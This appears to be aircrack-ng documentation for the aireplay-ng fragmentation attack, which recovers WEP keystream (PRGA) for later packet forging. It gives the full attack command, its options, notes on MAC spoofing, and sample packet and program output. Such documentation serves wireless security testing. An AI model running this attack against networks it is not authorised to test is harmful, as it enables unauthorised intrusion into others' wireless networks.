This attack, when successful, can obtain 1500 bits of PRGA (pseudo random genration algorithm). This attack does not recover the WEP key itself, but merely obtains the PRAGA. The PRGA can then be used to generate packets with packetforge-ng which are in turn used for various injection attacks. It requires at least one data packet needs to be received from the access point in order to initiate the attack.

Basically, the program obains a small amount of keying material from the packet then attempts to send arp and/or LLC packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. This cycle is repeated a several times until 1500 bits of PRAGA are obtained or sometimes less then 1500 bits.

The original paper by Andrea Bittau at http://www.toorcon.org/2005/slides/abittau/paper.pdf provides a much more detailed technical description of the technique.

aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D ath0
Where:

• -5 means run the fragmentation attack
• -b 00:14:6C:7E:40:80 is access point MAC address
• -h 00:0F:B5:AB:CB:9D is source MAC address of the packets to be injected
• ath0 is the interface name

Optionally, the following filters can be applied:

• -b bssid : MAC address, Access Point
• -d dmac : MAC address, Destination
• -s smac : MAC address, Source
• -m len : minimum packet length
• -n len : maximum packet length
• -u type : frame control, type field
• -v subt : frame control, subtype field
• -t tods : frame control, To DS bit
• -f fromds : frame control, From DS bit
• -w iswep : frame control, WEP bit

Optionally, the following replay options can be set:

• -k IP : set destination IP in fragments - defaults to 255.255.255.255
• -l IP : set source IP in fragments - defaults to 255.255.255.255

Notes:

• The source MAC address used in the attack must be associated with the access point. To do this, you can use fake_authentication or use a MAC address of existing wireless client.

• For madwifi-ng drivers (Atheros chipset), you must change MAC address of your card to the MAC address you will injecting with otherwise the attack will not work.

Essentially you start the attack with the following command then select the packet you want to try:
aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D ath0

Waiting for a data packet...
Read 96 packets...

      Size: 120, FromDS: 1, ToDS: 0 (WEP)

           BSSID  =  00:14:6C:7E:40:80
       Dest. MAC  =  00:0F:B5:AB:CB:9D
      Source MAC  =  00:D0:CF:03:34:8C

      0x0000:  0842 0201 000f b5ab cb9d 0014 6c7e 4080  .B..........l~@.
      0x0010:  00d0 cf03 348c e0d2 4001 0000 2b62 7a01  ....4...@...+bz.
      0x0020:  6d6d b1e0 92a8 039b ca6f cecb 5364 6e16  mm.......o..Sdn.
      0x0030:  a21d 2a70 49cf eef8 f9b9 279c 9020 30c4  ..*pI.....'.. 0.
      0x0040:  7013 f7f3 5953 1234 5727 146c eeaa a594  p...YS.4W'.l....
      0x0050:  fd55 66a2 030f 472d 2682 3957 8429 9ca5  .Uf...G-&.9W.)..
      0x0060:  517f 1544 bd82 ad77 fe9a cd99 a43c 52a1  Q.D...w.....<R.
      0x0070:  0505 933f af2f 740e                      ...?./t.

 Use this packet ? y

The program responds (or similar):

 Saving chosen packet in replay_src-0124-161120.cap
 Data packet found!
 Sending fragmented packet
 Got RELAYED packet!!
 Thats our ARP packet!
 Trying to get 384 bytes of a keystream
 Got RELAYED packet!!
 Thats our ARP packet!
 Trying to get 1500 bytes of a keystream
 Got RELAYED packet!!
 Thats our ARP packet!
 Saving keystream in fragment-0124-161129.xor
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

You have successfully obtained the PRAGA which is stored in the file named by the program. You can now use packetforge-ng to generate one or more packets to be used for various injection attacks.